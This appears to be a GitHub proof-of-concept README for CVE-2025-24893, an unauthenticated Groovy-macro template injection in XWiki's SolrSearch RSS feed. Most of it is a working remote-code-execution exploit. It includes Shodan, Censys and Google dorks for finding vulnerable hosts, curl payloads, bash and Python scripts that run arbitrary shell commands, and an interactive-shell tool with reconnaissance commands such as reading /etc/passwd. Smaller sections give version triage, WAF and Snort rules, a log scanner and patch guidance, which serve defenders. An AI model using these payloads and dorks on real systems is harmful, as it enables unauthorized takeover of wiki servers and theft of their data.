Related vulnerability

Description
CVE-2025-24893 exploit

Introduction
            # CVE-2025-24893 - XWiki Remote Code Execution via SolrSearch SSTI
## 📋 Vulnerability Overview
**CVE-2025-24893** is a critical remote code execution vulnerability in XWiki Platform: any unauthenticated guest can inject wiki macro syntax through the `text` parameter of the `Main.SolrSearch` page's RSS output (Server-Side Template Injection), get a `{{groovy}}` macro evaluated on the server, and from there run arbitrary OS commands as the user the XWiki JVM runs as.
### 🎯 Technical Details
- **Vulnerability Type**: Server-Side Template Injection (SSTI) → Remote Code Execution (RCE)
- **CVSS v3.1 Score**: **9.8 CRITICAL**
- **Vector**: `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
- **Authentication Required**: None (a guest who can view the wiki is sufficient)
- **Component**: the `Main.SolrSearchMacros` page (SolrSearchMacros.xml, line 955), which places the raw search text inside wiki syntax when rendering the RSS feed
- **Impact**: Full compromise of the XWiki host (code runs with the privileges of the servlet container)
### 📦 Affected Versions
- **XWiki 5.3-milestone-2** → **15.10.10**
- **XWiki 16.0.0-rc-1** → **16.4.0**
### 🔧 Fixed Versions
- ✅ **XWiki 15.10.11**
- ✅ **XWiki 16.4.1** 
- ✅ **XWiki 16.5.0RC1**
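Version triage is the first thing a responder needs from the two ranges above, and XWiki version strings mix styles (`15.10.10`, `16.5.0RC1`, `5.3-milestone-2`, `16.0.0-rc-1`), so a naive string compare gets the pre-release boundaries wrong. The following is an added Python helper (not code from the tool or from XWiki) that parses those strings into comparable tuples and checks them against the advisory's half-open ranges; the `Platform x.y.z` banner regex reuses the heuristic from the Step 1 check further down and will return nothing on installations that do not print their version:

```python
import re

# Pre-release tags sort below the final release of the same number: milestone < rc < final.
_PRE_RANK = {"milestone": 0, "rc": 1}
_FINAL = 2

_VERSION_RE = re.compile(
    r"(\d+)\.(\d+)(?:\.(\d+))?[-.]?(?:(milestone|rc)-?(\d+))?", re.IGNORECASE
)


def parse_xwiki_version(text):
    """Turn '15.10.10', '16.5.0RC1', '16.0.0-rc-1' or '5.3-milestone-2' into a
    comparable tuple (major, minor, patch, pre_rank, pre_num)."""
    m = _VERSION_RE.fullmatch(text.strip())
    if not m:
        raise ValueError("unrecognised XWiki version: %r" % text)
    major, minor, patch, tag, num = m.groups()
    pre_rank = _PRE_RANK[tag.lower()] if tag else _FINAL
    return (int(major), int(minor), int(patch or 0), pre_rank, int(num or 0))


# Half-open ranges [first affected, first fixed) as stated in the upstream advisory.
AFFECTED_RANGES = [
    (parse_xwiki_version("5.3-milestone-2"), parse_xwiki_version("15.10.11")),
    (parse_xwiki_version("16.0.0-rc-1"), parse_xwiki_version("16.4.1")),
]


def is_affected(version_text):
    """True when the version falls inside one of the affected ranges."""
    v = parse_xwiki_version(version_text)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


# Heuristic: some XWiki pages print "Platform <version>" in their HTML (same check as Step 1 below).
_BANNER_RE = re.compile(
    r"Platform\s+(\d+\.\d+(?:\.\d+)?(?:-?(?:milestone|rc)-?\d+)?)", re.IGNORECASE
)


def version_from_html(html):
    """Return the first 'Platform x.y.z' version string in a page body, or None."""
    m = _BANNER_RE.search(html)
    return m.group(1) if m else None


def triage(html):
    """None when no version banner is visible, else (version, affected?)."""
    v = version_from_html(html)
    return None if v is None else (v, is_affected(v))


if __name__ == "__main__":
    for sample in ("15.10.10", "15.10.11", "16.4.0", "16.4.1", "16.5.0RC1", "5.3-milestone-1"):
        print(sample, "affected" if is_affected(sample) else "not affected")
```

A missing banner is reported as `None`, not as "safe": absence of a version string says nothing about the version, so fall back to the payload check in Step 2.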
---
## 🔍 Reconnaissance & Target Discovery
### 🛰️ Shodan Dorks
```bash
# Basic XWiki detection
title:"XWiki" port:8080,80,443
# XWiki with version information
http.title:"XWiki" http.html:"XWiki Platform"
# Version hints (heuristic: the version string appears in the HTML of only some pages/skins, and a negative filter excludes just the one string named)
http.title:"XWiki" http.html:"15.10" -http.html:"15.10.11"
http.title:"XWiki" http.html:"16." -http.html:"16.4.1" -http.html:"16.5.0"
# XWiki installation pages
http.html:"XWiki.XWikiPreferences" port:8080,80,443
# XWiki REST API endpoints
http.html:"/rest/wikis/xwiki" port:8080,80,443
# SolrSearch specific detection
http.html:"SolrSearch" http.title:"XWiki"
# Combined search with country filtering
title:"XWiki" port:8080,80,443 country:"US"
title:"XWiki" port:8080,80,443 country:"DE"
title:"XWiki" port:8080,80,443 country:"FR"
```
### 🔎 Censys Search Queries
```bash
# Basic XWiki detection
services.http.response.html_title:"XWiki"
# Version-specific searches
services.http.response.body:"XWiki Platform 15.10" and not services.http.response.body:"15.10.11"
services.http.response.body:"XWiki Platform 16." and not services.http.response.body:"16.4.1"
# SolrSearch endpoint detection
services.http.response.body:"SolrSearch" and services.http.response.html_title:"XWiki"
# Combined with specific ports
services.port:8080 and services.http.response.html_title:"XWiki"
services.port:80 and services.http.response.html_title:"XWiki"
```
### 🌐 Google Dorks
```bash
# Basic XWiki detection
intitle:"XWiki" inurl:"/xwiki/bin/"
# Login pages (often reveal version)
intitle:"XWiki" inurl:"/xwiki/bin/login"
# Administration panels
intitle:"XWiki" inurl:"/xwiki/bin/admin"
# SolrSearch pages
inurl:"/xwiki/bin/view/Main/SolrSearch"
# Version disclosure
inurl:"/xwiki/bin/" "Platform 15.10" -"15.10.11"
inurl:"/xwiki/bin/" "Platform 16." -"16.4.1"
# Directory listings
intitle:"Index of" inurl:"/xwiki/"
```
---
## 🎯 Manual Proof of Concept (PoC)
### Step 1: Target Identification
First, verify you have an XWiki installation:
```bash
# Check if target is running XWiki
curl -s "http://target.com/xwiki/bin/view/Main/" | grep -i "xwiki"
# Check version (if accessible)
curl -s "http://target.com/xwiki/bin/view/XWiki/XWikiPreferences" | grep -o "Platform [0-9]\+\.[0-9]\+\.[0-9]\+"
```
### Step 2: Vulnerability Test (Official CVE Payload)
Use the test payload from the upstream advisory. The RSS output places the search text inside a `{{{ ... }}}` verbatim block; the leading `}}}` closes that block, so the `{{async}}` and `{{groovy}}` macros that follow are rendered as wiki syntax:
```bash
# Base payload from the CVE advisory (two-brace macro syntax: {{async}} and {{groovy}})
PAYLOAD='}}}{{async async=false}}{{groovy}}println("Hello from" + " search text:" + (23 + 19)){{/groovy}}{{/async}}'
# URL-encode the payload; pass it as an argument so quotes inside it cannot break the Python string
ENCODED=$(python3 -c "import sys, urllib.parse; print(urllib.parse.quote(sys.argv[1], safe=''))" "$PAYLOAD")
# Test the vulnerability (endpoint documented in the advisory)
curl -s "http://target.com/xwiki/bin/get/Main/SolrSearch?media=rss&text=$ENCODED" | grep -o "Hello from search text:42"
```
**Expected Result**: If vulnerable, the response contains `Hello from search text:42`; the `42` proves the Groovy expression `23 + 19` was evaluated on the server rather than echoed back as text.
### Step 3: Command Execution PoC
Once the marker check succeeds, run a command. `['whoami'].execute()` is Groovy's list-based process launch, so the command runs without a shell:
```bash
# Simple command execution test
COMMAND="whoami"
PAYLOAD="}}}{{async async=false}}{{groovy}}println(['$COMMAND'].execute().text){{/groovy}}{{/async}}"
# URL encode via argv: the payload's own single quotes would otherwise terminate the Python string
ENCODED=$(python3 -c "import sys, urllib.parse; print(urllib.parse.quote(sys.argv[1], safe=''))" "$PAYLOAD")
# Execute the payload
curl -s "http://target.com/xwiki/bin/get/Main/SolrSearch?media=rss&text=$ENCODED"
```
### Step 4: Advanced Command Execution
For commands with arguments, pipes or redirections, hand the whole string to a shell. A single quote inside `$COMMAND` would end the Groovy string literal, so avoid them here or escape them as `\'`:
```bash
# Command with arguments
COMMAND="ls -la"
PAYLOAD="}}}{{async async=false}}{{groovy}}println(['/bin/sh', '-c', '$COMMAND'].execute().text){{/groovy}}{{/async}}"
ENCODED=$(python3 -c "import sys, urllib.parse; print(urllib.parse.quote(sys.argv[1], safe=''))" "$PAYLOAD")
curl -s "http://target.com/xwiki/bin/get/Main/SolrSearch?media=rss&text=$ENCODED"
```
### 🛠️ Manual Testing Script
A bash script for manual testing. The macro syntax follows the advisory payload, the command is handed to Python as an argument so its quotes cannot break the encoder, and the raw response is printed when the output pattern does not match:
```bash
#!/bin/bash
# CVE-2025-24893 Manual PoC Script
TARGET="$1"
COMMAND="$2"
if [ -z "$TARGET" ] || [ -z "$COMMAND" ]; then
    echo "Usage: $0 <target_url> <command>"
    echo "Example: $0 http://xwiki.example.com 'whoami'"
    exit 1
fi
# Remove trailing slash
TARGET="${TARGET%/}"
# Create payload: close the {{{ }}} verbatim block, then run the command via the groovy macro
# (a single quote inside COMMAND would end the Groovy string literal; keep commands quote-free)
PAYLOAD="}}}{{async async=false}}{{groovy}}println(['/bin/sh', '-c', '$COMMAND'].execute().text){{/groovy}}{{/async}}"
# URL encode (argv, not string interpolation, so the payload's own quotes are harmless)
ENCODED=$(python3 -c "import sys, urllib.parse; print(urllib.parse.quote(sys.argv[1], safe=''))" "$PAYLOAD")
# Endpoints to try; only the first is the one documented in the advisory
ENDPOINTS=(
    "/xwiki/bin/get/Main/SolrSearch?media=rss&text="
    "/xwiki/bin/view/Main/SolrSearch?media=rss&text="
    "/xwiki/bin/get/XWiki/SolrSearch?media=rss&text="
    "/xwiki/bin/view/XWiki/SolrSearch?media=rss&text="
)
echo "[*] Testing CVE-2025-24893 on $TARGET"
echo "[*] Command: $COMMAND"
echo
for endpoint in "${ENDPOINTS[@]}"; do
    echo "[*] Trying endpoint: $endpoint"
    RESPONSE=$(curl -s --max-time 15 "$TARGET$endpoint$ENCODED" 2>/dev/null)
    if [ $? -eq 0 ] && [ -n "$RESPONSE" ]; then
        echo "[+] Response received, checking for command output..."
        # Extract output (simplified parsing of the RSS body); fall back to the raw response
        OUTPUT=$(echo "$RESPONSE" | grep -o "search on \[}}[^]]*" | sed 's/search on \[}}//')
        if [ -n "$OUTPUT" ]; then
            echo "$OUTPUT"
        else
            echo "[-] No output matched the expected pattern; raw response follows"
            echo "$RESPONSE"
        fi
    else
        echo "[-] No response or error"
    fi
    echo
done
```
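The four steps above as one Python script (an added example, not the tool's `exploit.py` and not XWiki code): it builds the advisory's payload, URL-encodes it with `urllib.parse.quote(safe='')` so the brace and slash characters survive, escapes the shell command as a Groovy string literal, and checks the response for the `42` marker. The base URL, the `User-Agent` string and the RSS snippet used in the self-check are placeholders:

```python
import sys
import urllib.parse
import urllib.request

# Endpoint and marker from the upstream advisory; the marker is what 23 + 19 prints.
SOLRSEARCH_PATH = "/xwiki/bin/get/Main/SolrSearch"
MARKER = "Hello from search text:42"


def wrap_in_groovy(groovy_code):
    """The RSS output wraps the search text in a {{{ ... }}} verbatim block.  The leading
    }}} closes it, so the async and groovy macros that follow are rendered as wiki syntax."""
    return "}}}{{async async=false}}{{groovy}}" + groovy_code + "{{/groovy}}{{/async}}"


def test_payload():
    """The advisory's harmless check: prints a string only a Groovy evaluation can produce."""
    return wrap_in_groovy('println("Hello from" + " search text:" + (23 + 19))')


def groovy_literal(s):
    """Single-quoted Groovy string literal; escapes backslashes and quotes so a shell
    command containing quotes does not break out of the Groovy source."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def command_payload(command):
    """Run `command` through /bin/sh -c and print its stdout into the RSS body."""
    return wrap_in_groovy(
        "println(['/bin/sh', '-c', %s].execute().text)" % groovy_literal(command)
    )


def build_url(base_url, payload):
    # safe="" also encodes '/', so {{/groovy}} and {{/async}} arrive inside one parameter value.
    return (base_url.rstrip("/") + SOLRSEARCH_PATH
            + "?media=rss&text=" + urllib.parse.quote(payload, safe=""))


def marker_found(body):
    """True when the server evaluated the test expression instead of echoing it."""
    return MARKER in body


def fetch(url, timeout=15):
    """Network call: GET the URL and return the body as text (placeholder User-Agent)."""
    req = urllib.request.Request(url, headers={"User-Agent": "CVE-2025-24893-check"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def probe(base_url):
    """Send the advisory's test payload and report whether the marker came back."""
    return marker_found(fetch(build_url(base_url, test_payload())))


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit("usage: %s <base_url> [shell command]" % sys.argv[0])
    base = sys.argv[1]
    if len(sys.argv) == 2:
        print("vulnerable" if probe(base) else "marker not returned")
    else:
        print(fetch(build_url(base, command_payload(" ".join(sys.argv[2:])))))
```

`python3 poc.py http://wiki.example` runs only the marker check; `python3 poc.py http://wiki.example "id; uname -a"` runs a command, with `groovy_literal` handling any quotes in it. Only the `get` action on `Main.SolrSearch` is used because that is the endpoint the advisory documents.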
---
## 🚀 Automated Tool Usage
### Installation
```bash
git clone https://github.com/ibrahmsql/CVE-2025-24893.git
cd CVE-2025-24893
```
### Basic Usage
```bash
# Test for vulnerability (recommended first step)
python3 exploit.py -u http://target.com --test
# Interactive shell
python3 exploit.py -u http://target.com
# Execute single command
python3 exploit.py -u http://target.com -c "whoami"
# Debug mode
python3 exploit.py -u http://target.com -c "id" --debug
# HTTPS without SSL verification
python3 exploit.py -u https://target.com --test --no-verify-ssl
```
### Advanced Examples
```bash
# System reconnaissance
python3 exploit.py -u http://target.com -c "uname -a"
python3 exploit.py -u http://target.com -c "cat /etc/passwd"
python3 exploit.py -u http://target.com -c "ps aux"
# Network information
python3 exploit.py -u http://target.com -c "ifconfig"
python3 exploit.py -u http://target.com -c "netstat -tulpn"
# File system exploration
python3 exploit.py -u http://target.com -c "find / -name '*.conf' 2>/dev/null"
python3 exploit.py -u http://target.com -c "ls -la /var/log/"
```
---
## 🔧 Vulnerable Endpoints
The advisory documents the `get` action on `Main.SolrSearch` with `media=rss` (the first line below). The tool additionally tries the `view` action and the `XWiki.SolrSearch`, `Main.Search` and `XWiki.Search` variants; these are not covered by the advisory, so only a hit on the first endpoint confirms the CVE, and a miss on the others proves nothing:
```
/xwiki/bin/get/Main/SolrSearch?media=rss&text=PAYLOAD
/xwiki/bin/view/Main/SolrSearch?media=rss&text=PAYLOAD
/xwiki/bin/get/XWiki/SolrSearch?media=rss&text=PAYLOAD
/xwiki/bin/view/XWiki/SolrSearch?media=rss&text=PAYLOAD
/xwiki/bin/view/Main/Search?media=rss&text=PAYLOAD
/xwiki/bin/view/XWiki/Search?media=rss&text=PAYLOAD
```
---
## 🛡️ Detection & Defense
### Detection Methods
1. **Web Application Firewall (WAF) Rules** (ModSecurity; `ARGS` is already URL-decoded, so match the decoded macro syntax rather than `%7B%7B`):
   ```
   # The injection starts by closing the {{{ }}} verbatim block the search text is rendered in
   SecRule ARGS "@contains }}}" "id:1002,phase:2,deny,status:403,log,msg:'XWiki verbatim-block escape'"
   # Anchor on the macro delimiters: a bare "groovy" or "async" is a legitimate search term
   SecRule ARGS "@rx \{\{\s*/?(?:async|groovy)\b" "id:1003,phase:2,deny,status:403,log,msg:'XWiki async/groovy macro injection'"
   ```
   `@detectSQLi` is libinjection's SQL-injection check; it does not recognise wiki macro syntax and adds nothing here.
2. **Log Monitoring** (access logs keep the URL-encoded form: the braces are `%7B`/`%7D`, the macro names stay plain text):
   ```bash
   # Monitor for SolrSearch requests that close a verbatim block or open the async/groovy macros
   grep -iE 'SolrSearch[^ ]*(%7D%7D%7D|%7B%7B(async|groovy))' /var/log/apache2/access.log
   ```
3. **Network Detection** (plaintext HTTP only; behind TLS the signature needs a decrypting proxy or the web server's own logs):
   ```bash
   # Snort rule for CVE-2025-24893: both strings must appear in the normalised request URI of a client request
   alert tcp any any -> any $HTTP_PORTS (msg:"CVE-2025-24893 XWiki SolrSearch SSTI attempt"; flow:to_server,established; content:"SolrSearch"; http_uri; content:"groovy"; http_uri; nocase; classtype:web-application-attack; sid:1000001; rev:1;)
   ```
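To show why a brace-anchored pattern beats a bare `groovy` keyword match when hunting through access logs, here is an added Python log scanner (not part of the tool) run over three constructed Apache combined-format lines: an ordinary search, the advisory's URL-encoded test payload, and a benign search for the word "groovy". The IPs, timestamps and user agents are made up:

```python
import re
import urllib.parse
from collections import namedtuple

# Constructed Apache combined-log lines for the demo (not captured traffic):
# 1 ordinary search, 2 the advisory test payload, 3 a benign search containing the word "groovy".
SAMPLE_LOG = """\
10.0.0.5 - - [16/Mar/2025:10:01:02 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=backup%20policy HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
203.0.113.9 - - [16/Mar/2025:10:01:07 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 1876 "-" "python-requests/2.32"
10.0.0.8 - - [16/Mar/2025:10:03:11 +0000] "GET /xwiki/bin/view/Main/SolrSearch?text=groovy%20scripting%20guide HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# Wiki macro delimiters around the two macros the exploit needs; a bare keyword is not enough.
MACRO_RE = re.compile(r"\{\{\s*/?(async|groovy)\b", re.IGNORECASE)

Finding = namedtuple("Finding", "ip ts uri param macros")


def inspect_request(line):
    """Return a Finding when a SolrSearch request carries wiki macro syntax in a parameter."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path, _, query = m["uri"].partition("?")
    if "/SolrSearch" not in path:          # the page the advisory names (any action)
        return None
    for name, values in urllib.parse.parse_qs(query, keep_blank_values=True).items():
        for value in values:               # parse_qs has already URL-decoded the value
            macros = sorted({x.lower() for x in MACRO_RE.findall(value)})
            if "}}}" in value or macros:
                return Finding(m["ip"], m["ts"], m["uri"], name, macros)
    return None


def scan(log_text):
    """All findings in a log, one per offending request line."""
    return [f for f in (inspect_request(ln) for ln in log_text.splitlines()) if f]


def naive_grep(log_text):
    """Keyword-only check ('SolrSearch' followed by 'groovy'), for comparison."""
    return [ln for ln in log_text.splitlines() if re.search(r"SolrSearch.*groovy", ln, re.IGNORECASE)]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print("%s %s param=%s macros=%s" % (f.ts, f.ip, f.param, ",".join(f.macros)))
    print("naive keyword grep would flag %d lines" % len(naive_grep(SAMPLE_LOG)))
```

The scanner decodes each parameter before matching, so it sees `{{groovy}}` regardless of how the client encoded the braces, and it records which macros appeared so an analyst can tell the advisory's exact payload from a variant. The keyword grep flags the harmless "groovy scripting guide" search as well.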
### Mitigation
1. **Immediate**: Upgrade to XWiki 15.10.11, 16.4.1 or 16.5.0RC1 (or later).
2. **Temporary**: If you cannot upgrade yet, apply the manual edit to the `Main.SolrSearchMacros` page described in the advisory's workaround section (it mirrors the patch), or remove guest view access to `Main.SolrSearch`; both change search behaviour for anonymous users.
3. **Long-term**: WAF and IDS signatures are a detection layer, not a fix. The root cause is untrusted search text being rendered as wiki syntax, so any page that renders user input must escape it, and scripting macros such as `{{groovy}}` must only run with the rights of users who already hold programming rights.
---
## 📚 References
- **CVE-2025-24893**: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
- **XWiki Security Advisory**: https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j
- **JIRA Issue**: https://jira.xwiki.org/browse/XWIKI-22149
- **XWiki Official Site**: https://xwiki.org
---
## ⚠️ Disclaimer
**This tool is for educational and authorized security testing purposes only.**
- Only test systems you own or have explicit permission to test
- Unauthorized access to computer systems is illegal
- The authors are not responsible for misuse of this information
- Use responsibly and ethically
---
## 👨💻 Author
- **Author**: ibrahimsql
- **GitHub**: https://github.com/ibrahmsql
- **Contact**: ibrahimsql@proton.me
---
## 📄 License
This project is released under the MIT License. See LICENSE file for details.
        
File snapshot

 [4.0K]  /data/pocs/f99d545a9350954588664537c136bf46d188122e
├── [ 13K]  exploit.py
├── [ 11K]  manual_poc.sh
└── [9.4K]  README.md
0 directories, 3 files